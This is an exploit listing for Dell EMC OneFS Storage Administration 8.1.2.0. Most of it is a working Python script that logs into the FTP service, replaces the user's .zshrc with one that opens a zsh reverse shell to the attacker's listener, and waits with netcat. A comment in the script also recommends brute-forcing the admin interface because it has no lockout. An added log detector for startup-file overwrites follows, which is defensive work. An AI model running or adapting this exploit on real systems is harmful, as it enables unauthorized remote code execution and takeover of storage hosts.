
DELL EMC OneFS Storage Administration 8.1.2.0 .zshrc Overwrite

11 Oct 2018 | Reported by wetw0rk | Type: packetstorm | Source: packetstormsecurity.com

A vulnerability in DELL EMC OneFS Storage Administration 8.1.2.0 allows unauthorized access and code execution via the FTP service. Injection into the user's .zshrc file leads to arbitrary code execution.

Code
```python
#!/usr/bin/env python
#
# Exploit name : isilon-onefs-brute.py
# Created date : 9/21/18
# Submit Date : 10/10/18
# Author : wetw0rk
# Python version : 2.7
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py
# Vendor Homepage : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
# Software Link : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip
# Tested on : DELL EMC OneFS Storage Administration 8.1.2.0
#
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# [------------ Timeline ------------]
# 9/21/18 - Contacted Dell PSIRT
# 9/25/18 - Sent POC code
# 10/9/18 - Responded with "not considered a vulnerability"
#
# Description :
# To exploit this vulnerability first you must gain access to the administrative
# interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable
# FTP like so:
# -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!
#
# Since you're dropped in the user home directory and not a secluded FTP directory
# you can inject into .zshrc, however as dell stated you can access other files on
# the system as well....
#

import os
import sys
import socket
import threading

RED = "\033[1m\033[31m[-]\033[0m"
BLUE = "\033[1m\033[94m[*]\033[0m"
GREEN = "\033[1m\033[92m[+]\033[0m"

def background_server(lhost):
    global check

    fd = open(".zshrc", 'w')

    host = "0.0.0.0"
    port = 50121
    sock = socket.socket(
        socket.AF_INET,
        socket.SOCK_STREAM
    )
    sock.bind((host, port))
    sock.listen(5)

    print("%s listening on %s:%s" % (BLUE, host,port))
    while True:
        conn, addr = sock.accept()
        if check != 1:
            zshrc_file = conn.recv(4096)
            print("%s generating .zshrc payload" % BLUE)
            fd.write(zshrc_file)
            # msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw
            fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)
            fd.close()
        else:
            with open('.zshrc', 'r') as myfile:
                data=myfile.read()
            conn.send(data)

try:
    rhost = sys.argv[1]
    rport = int(sys.argv[2])
    lhost = sys.argv[3]
    username = sys.argv[4]
    password = sys.argv[5]
except:
    print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])
    print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])
    exit(0)

check = 0 # start a background server for download+uploads
server_thread = threading.Thread(target=background_server, args=(lhost,))
server_thread.start()

# create a socket for the client sending the commands
print("%s connecting to %s:%s" % (BLUE, rhost, rport))
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((rhost, rport))
csock.recv(4096)
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))
csock.send("USER %s\r\n" % username)
csock.recv(4096)
csock.send("PASS %s\r\n" % password)
csock.recv(4096)
print("%s login was successful downloading .zshrc" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("RETR .zshrc\r\n")
csock.recv(4096)
csock.send("RNFR .zshrc\r\n")
csock.recv(4096)
print("%s renaming remote .zshrc to .backup" % GREEN)
csock.send("RNTO .backup\r\n")
csock.recv(4096)
check = 1
print("%s uploading payload to target host" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("TYPE I\r\n")
csock.recv(4096)
csock.send("STOR .zshrc\r\n")
print("%s exploitation complete waiting for %s to login" % (GREEN, username))
os.system("nc -lvp 443")
csock.close()
```
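
For defenders, the FTP command sequence the script sends (RNFR on `.zshrc`, then STOR of the same name) can be flagged in FTP protocol logs. The following Python 3 detector is an added example, not part of the original advisory or the author's code; it assumes vsftpd-style protocol log lines, and the watch list, the function name and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed watch list: files a shell sources at the next interactive login.
STARTUP_FILES = {".zshrc", ".zshenv", ".zprofile", ".zlogin",
                 ".bashrc", ".bash_profile", ".profile", ".cshrc", ".login"}
WRITE_CMDS = {"STOR", "APPE", "RNFR", "RNTO", "DELE"}

# Assumed vsftpd-style protocol log line; adjust the regex for your FTP daemon.
LINE_RE = re.compile(
    r'\[pid (?P<pid>\d+)\] \[(?P<user>[^\]]+)\] FTP command: '
    r'Client "(?P<client>[^"]+)", "(?P<cmd>[A-Za-z]+)(?: (?P<arg>[^"]*))?"')

# Constructed sample lines (not captured from a real system).
SAMPLE_LOG = [
    'Wed Oct 10 09:14:01 2018 [pid 4120] [admin] FTP command: Client "192.0.2.10", "RETR .zshrc"',
    'Wed Oct 10 09:14:01 2018 [pid 4120] [admin] FTP command: Client "192.0.2.10", "RNFR .zshrc"',
    'Wed Oct 10 09:14:02 2018 [pid 4120] [admin] FTP command: Client "192.0.2.10", "RNTO .backup"',
    'Wed Oct 10 09:14:02 2018 [pid 4120] [admin] FTP command: Client "192.0.2.10", "TYPE I"',
    'Wed Oct 10 09:14:02 2018 [pid 4120] [admin] FTP command: Client "192.0.2.10", "STOR .zshrc"',
    'Wed Oct 10 09:20:00 2018 [pid 4188] [alice] FTP command: Client "192.0.2.44", "STOR reports/q3.csv"',
    'Wed Oct 10 09:25:30 2018 [pid 4190] [bob] FTP command: Client "192.0.2.51", "APPE /home/bob/.bashrc"',
]

def find_startup_file_writes(lines):
    """Group write-type FTP commands on shell startup files by session."""
    sessions = defaultdict(list)
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        cmd = m["cmd"].upper()
        # Compare on the final path component so absolute paths also match.
        name = (m["arg"] or "").rstrip("/").rsplit("/", 1)[-1]
        if cmd in WRITE_CMDS and name in STARTUP_FILES:
            sessions[(m["pid"], m["user"], m["client"])].append((cmd, name))
    findings = []
    for (_, user, client), events in sessions.items():
        renamed, severity = set(), "medium"
        for cmd, name in events:
            if cmd == "RNFR":
                renamed.add(name)
            elif name in renamed:
                # Original moved aside, then the same name written: replacement.
                severity = "high"
        findings.append({"user": user, "client": client,
                         "events": events, "severity": severity})
    return findings
```

Calling `find_startup_file_writes(SAMPLE_LOG)` returns one finding per session; a session that renames a startup file away and then writes the same name is rated `high`, any other write to a startup file `medium`.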
